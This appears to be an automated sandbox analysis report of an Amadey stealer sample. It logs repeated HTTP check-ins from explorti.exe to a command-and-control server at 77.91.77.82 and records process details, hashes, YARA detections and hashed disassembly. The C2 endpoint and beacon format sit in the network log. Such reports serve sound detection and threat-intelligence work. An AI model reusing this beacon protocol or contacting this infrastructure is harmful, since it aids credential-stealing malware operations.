                      139192.168.2.44987877.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:18:12.061134100 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:18:12.788053989 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:18:12 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      140192.168.2.44987977.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:18:12.908052921 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:18:13.613042116 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:18:13 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      141192.168.2.44988077.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:18:13.621675968 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:18:14.327178001 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:18:14 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      142192.168.2.44988177.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:18:14.446329117 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:18:15.153497934 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:18:15 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      143192.168.2.44988277.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:18:15.162564039 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:18:15.853296041 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:18:15 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      144192.168.2.44988377.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:18:15.978595972 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:18:16.691988945 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:18:16 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      145192.168.2.44988477.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:18:16.701327085 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:18:17.446074009 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:18:17 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      146192.168.2.44988577.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:18:17.570921898 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:18:18.316577911 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:18:18 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      147192.168.2.44988677.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:18:18.325999975 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:18:19.149528980 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:18:19 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      148192.168.2.44988777.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:18:19.274396896 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:18:19.996706009 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:18:19 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      149192.168.2.44988877.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:18:20.011970997 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:18:20.703551054 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:18:20 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:15:15:56
                      Start date:28/06/2024
                      Path:C:\Users\user\Desktop\file.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\file.exe"
                      Imagebase:0xab0000
                      File size:1'899'008 bytes
                      MD5 hash:A562C59E3A4D9BE348D5581D23E483DB
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1719361703.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1679021275.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:1
                      Start time:15:15:59
                      Start date:28/06/2024
                      Path:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
                      Imagebase:0x170000
                      File size:1'899'008 bytes
                      MD5 hash:A562C59E3A4D9BE348D5581D23E483DB
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.4135900487.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.1714687088.0000000004950000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      Antivirus matches:
                      • Detection: 100%, Avira
                      • Detection: 100%, Joe Sandbox ML
                      • Detection: 47%, ReversingLabs
                      Reputation:low
                      Has exited:false

                      General

                      Target ID:2
                      Start time:15:16:00
                      Start date:28/06/2024
                      Path:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      Imagebase:0x170000
                      File size:1'899'008 bytes
                      MD5 hash:A562C59E3A4D9BE348D5581D23E483DB
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1755893369.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.1715649380.0000000005230000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:7
                      Start time:15:17:00
                      Start date:28/06/2024
                      Path:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      Imagebase:0x170000
                      File size:1'899'008 bytes
                      MD5 hash:A562C59E3A4D9BE348D5581D23E483DB
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000007.00000002.2355173181.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000007.00000003.2313491451.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:9
                      Start time:15:18:00
                      Start date:28/06/2024
                      Path:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      Imagebase:0x170000
                      File size:1'899'008 bytes
                      MD5 hash:A562C59E3A4D9BE348D5581D23E483DB
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000003.2915454108.0000000004940000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000002.2955728153.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:10
                      Start time:15:19:00
                      Start date:28/06/2024
                      Path:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      Imagebase:0x170000
                      File size:1'899'008 bytes
                      MD5 hash:A562C59E3A4D9BE348D5581D23E483DB
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000A.00000002.3555727988.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000A.00000003.3515001828.0000000004C70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:11
                      Start time:15:20:00
                      Start date:28/06/2024
                      Path:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      Imagebase:0x170000
                      File size:1'899'008 bytes
                      MD5 hash:A562C59E3A4D9BE348D5581D23E483DB
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000B.00000003.4117971144.0000000004980000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:false

                      Disassembly

                      Reset < >

                        Executed Functions

                        Function 050E024A Relevance: .1, Instructions: 90COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1721040677.00000000050E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_50e0000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 98a64cbbf080b7bb8708a583124520b7fadd800eeac2824b91d97d8a6ab5ce39
                        • Instruction ID: b47958a5491e07608625f1f8ad0c13e4177defd5f6df706c481dd62690fc0af3
                        • Opcode Fuzzy Hash: 98a64cbbf080b7bb8708a583124520b7fadd800eeac2824b91d97d8a6ab5ce39
                        • Instruction Fuzzy Hash: E60117EF288120BE7042D2857B2CAFEABBEE6C6730730843AF443D6542E2C40E5D2131
                        Function 050E0203 Relevance: .1, Instructions: 118COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1721040677.00000000050E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_50e0000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3d97773011fa46e4ac431c68068258efac7329de6cbe395374f4117d75a6821b
                        • Instruction ID: 5c014f71a0f64c9092402331b57afd86cdf0c9cd7a13ae121edd226171563af5
                        • Opcode Fuzzy Hash: 3d97773011fa46e4ac431c68068258efac7329de6cbe395374f4117d75a6821b
                        • Instruction Fuzzy Hash: FF2192FB1481107EA10296957B2C5FE7BBEE6D77307308479F442D7542E2E44E4D6130
                        Function 050E021C Relevance: .1, Instructions: 111COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1721040677.00000000050E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_50e0000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c4978a499f448f133f70c75271ec4c1a3e1c1850c2c1e56a56fe2825973aa9cc
                        • Instruction ID: a6cc6fbc4f1d949898c2a67c7fceaed1c2d05cc695e22eda6e69fff773753a4f
                        • Opcode Fuzzy Hash: c4978a499f448f133f70c75271ec4c1a3e1c1850c2c1e56a56fe2825973aa9cc
                        • Instruction Fuzzy Hash: B721B3EB14C2517EA202969576289FE7BBEE9C773033085BAF443CB543D2D40E4D6231
                        Function 050E0251 Relevance: .1, Instructions: 96COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1721040677.00000000050E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_50e0000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0b460611fa21728a1012d944900cc5bb9641335c09a91f478ba0cdabdab71373
                        • Instruction ID: dd554b36cdf622a1cc21051b9c48e92e9ee11914b19ac6062af7a0cc0e382845
                        • Opcode Fuzzy Hash: 0b460611fa21728a1012d944900cc5bb9641335c09a91f478ba0cdabdab71373
                        • Instruction Fuzzy Hash: 88115EEF289110BEB152D6957B2CAFEA7BEE6D6730730843AF443D6542E2D40E4D6131
                        Function 050E0271 Relevance: .1, Instructions: 78COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1721040677.00000000050E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_50e0000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8f996fcfb0543e70992a38b89a4163d655d5e594c4ed2f8fd8f78475c5c9d7af
                        • Instruction ID: e1730730ae1286718ff76215a9834c878851d85b7a01564f7fbd6cab9bfa6a2d
                        • Opcode Fuzzy Hash: 8f996fcfb0543e70992a38b89a4163d655d5e594c4ed2f8fd8f78475c5c9d7af
                        • Instruction Fuzzy Hash: A90128EF2881207E7152D1967B2CAFE67AEE6C6730330C47AF842D6542E6D40E5D2131
                        Function 050E02A0 Relevance: .1, Instructions: 55COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1721040677.00000000050E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_50e0000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3778a475369703067aaab744936d8fe5169d959892e886b72cef465fa4a878f4
                        • Instruction ID: d8912a052ed4a58a6f60b8957de1db10dce68af3e047300cbb542cc2e4493735
                        • Opcode Fuzzy Hash: 3778a475369703067aaab744936d8fe5169d959892e886b72cef465fa4a878f4
                        • Instruction Fuzzy Hash: 52F0F6FB54D120AEB241E155766C6BE67AFF6C2730730803AF442C7043E2D40E5D6130
                        Function 050E02BD Relevance: .0, Instructions: 43COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1721040677.00000000050E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_50e0000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5b70bc1ebe9dba71db0c7ed65ce78687bd7fcbc41a333f400dac74e0fddcf576
                        • Instruction ID: 4a399aaacd0cd5290d88abc81959679e0699ad550f0122617091badd01ec57a8
                        • Opcode Fuzzy Hash: 5b70bc1ebe9dba71db0c7ed65ce78687bd7fcbc41a333f400dac74e0fddcf576
                        • Instruction Fuzzy Hash: C2E06DEF1880206EB092E1A6372C6FE6A6FE6C6B30770C436F442D6542A5C40E6D6131

                        Execution Graph

                        Execution Coverage:9.9%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:18.6%
                        Total number of Nodes:921
                        Total number of Limit Nodes:70
                        execution_graph 14920 1886d0 14921 18d2e8 RtlAllocateHeap 14920->14921 14922 18872a __cftof 14921->14922 14930 189ab0 14922->14930 14924 188754 14927 18876c __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 14924->14927 14934 1742f0 14924->14934 14929 1887df 14931 189ae5 14930->14931 14943 172be0 14931->14943 14933 189b16 14933->14924 14935 18bddf InitOnceExecuteOnce 14934->14935 14936 17430a 14935->14936 14937 174311 14936->14937 14938 1a6bcb 8 API calls 14936->14938 14940 18bd50 14937->14940 14939 174324 14938->14939 14997 18bc8b 14940->14997 14942 18bd66 std::_Throw_future_error 14942->14929 14944 172c1d 14943->14944 14945 18bddf InitOnceExecuteOnce 14944->14945 14946 172c46 14945->14946 14947 172c88 14946->14947 14948 172c51 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 14946->14948 14952 18bdf7 14946->14952 14961 172340 14947->14961 14948->14933 14953 18be03 14952->14953 14964 172800 14953->14964 14955 18be23 std::_Throw_future_error 14956 18be6a 14955->14956 14957 18be73 14955->14957 14972 18bd7f 14956->14972 14958 1729e0 9 API calls 14957->14958 14960 18be6f 14958->14960 14960->14947 14992 18b4d6 14961->14992 14963 172372 14965 187f00 RtlAllocateHeap 14964->14965 14966 17284f 14965->14966 14967 1725b0 RtlAllocateHeap 14966->14967 14969 172867 14967->14969 14968 17288d shared_ptr 14968->14955 14969->14968 14970 1a37bc ___std_exception_copy RtlAllocateHeap 14969->14970 14971 1728e4 14970->14971 14971->14955 14973 18cb34 InitOnceExecuteOnce 14972->14973 14974 18bd97 14973->14974 14975 18bd9e 14974->14975 14978 1a6bcb 14974->14978 14975->14960 14977 18bda7 14977->14960 14985 1a6bd7 __fassign 14978->14985 14979 1a8a8f __fassign 2 API calls 14980 1a6c06 14979->14980 14981 1a6c23 14980->14981 14982 1a6c15 14980->14982 14984 1a689d 3 API calls 14981->14984 14983 1a6c79 8 API calls 14982->14983 14986 1a6c1f 14983->14986 14987 1a6c3d 14984->14987 14985->14979 14986->14977 14988 1a67fd RtlAllocateHeap 14987->14988 14989 1a6c4a 14988->14989 14990 1a6c79 8 API calls 14989->14990 14991 1a6c51 ___free_lconv_mon 14989->14991 14990->14991 